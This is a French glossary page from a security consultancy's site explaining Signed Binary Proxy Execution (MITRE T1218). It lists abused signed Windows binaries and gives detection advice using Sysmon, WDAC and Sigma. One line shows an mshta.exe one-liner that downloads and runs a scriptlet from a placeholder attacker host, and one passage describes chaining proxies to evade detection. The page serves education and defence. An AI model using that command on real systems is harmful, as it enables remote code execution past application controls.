Signed Binary Proxy Execution
hackingDéfinition
La Signed Binary Proxy Execution est une technique d'évasion qui consiste à utiliser des fichiers binaires légitimement signés numériquement (par Microsoft, Apple, des éditeurs de logiciels) pour exécuter du code malveillant via proxy, contournant les contrôles basés sur la signature numérique et les listes blanches d'applications. Elle est documentée dans MITRE ATT&CK sous T1218.
Le principe est d'exploiter des binaires signés qui acceptent en paramètre des fichiers ou des commandes et les exécutent. Ces binaires sont dans les listes blanches car leur signature numérique est valide, mais le code qu'ils exécutent (les fichiers passés en paramètre) peut être arbitraire. La signature du binaire proxy ne garantit pas la légitimité de ce qu'il exécute.
Des exemples de binaires utilisés comme proxy d'exécution : mshta.exe (exécute des fichiers HTA - HTML Applications), regsvr32.exe (enregistre des DLL et exécute des scriptlets COM), rundll32.exe (exécute des fonctions exportées depuis des DLL), cscript.exe/wscript.exe (interpréteurs de scripts VBScript/JScript), powershell.exe (interpréteur PowerShell - partiellement contré par AMSI/CLM), odbcconf.exe (configure des sources de données ODBC, peut exécuter des DLLs), et mavinject.exe (injection de DLL dans des processus).
Des sous-techniques plus avancées incluent l'utilisation de PubPrn.vbs (script signé Microsoft permettant l'exécution via Windows Script Host), Control Panel Items (.cpl files exécutés par control.exe), et des installers signés (msiexec.exe avec des MSI malveillants).
La défense contre la Signed Binary Proxy Execution requiert une approche comportementale : surveiller les arguments inhabituels des binaires signés, les relations parent-enfant de processus anormales, et les connexions réseau depuis des processus qui ne devraient pas en établir (mshta.exe, regsvr32.exe avec des URL distantes).
Fonctionnement
Exemple mshta.exe : mshta.exe javascript:a=(GetObject('script:http://attaquant.com/payload.sct')).Exec();close(); télécharge et exécute un scriptlet COM depuis une URL. Mshta.exe est un binaire Microsoft signé, dans System32, souvent dans les listes blanches AppLocker. La surveillance de mshta.exe avec des arguments URL ou JavaScript dans les logs de processus (Sysmon EventID 1) est un détecteur efficace.
Exploitation offensive
La technique est particulièrement utile dans les environnements avec des solutions de contrôle d'applications strictes (WDAC/AppLocker en mode Whitelist) qui bloquent les binaires non signés mais permettent tous les binaires Microsoft. Le chainage de plusieurs binaires proxy (Office macro → mshta → cscript → wscript) complique la détection par chaîne d'attribution.
Détection et mitigation
Sysmon avec des règles sur les processus fils inattendus de binaires signés (mshta.exe → cmd.exe, regsvr32.exe → powershell.exe) est très efficace. Microsoft WDAC en mode 'Deny Specific Binaries' peut bloquer les LOLBins les plus abusés (mshta.exe, regsvr32.exe /u). Les règles Sigma pour la Signed Binary Proxy Execution (T1218) couvrent les patterns d'arguments les plus courants.
Articles liés
Expert en cybersécurité offensive et intelligence artificielle. Pentest, audit et développement IA sur-mesure.
Services
- Audit Infrastructure
- Audit Kubernetes
- Audit Microsoft 365
- Audit Sécurité Réseau
- Analyse de Risques
- Audit Active Directory
- Audit Application Web
- Audit Cloud (AWS/Azure/GCP)
- Audit Messagerie
- Audit API (OWASP Top 10)
- Audit DevSecOps & CI/CD
- Audit Code Source (SAST)
- Audit Postes de Travail
- Audit Sauvegarde & Résilience
- Audit OT/SCADA (IEC 62443)
- Développement IA
- Formations
Ressources
Projets & Outils
© 2026 Ayi NEDJIMI Consultants. Tous droits réservés.
Un projet cybersécurité ?
Expert dispo · Réponse 24h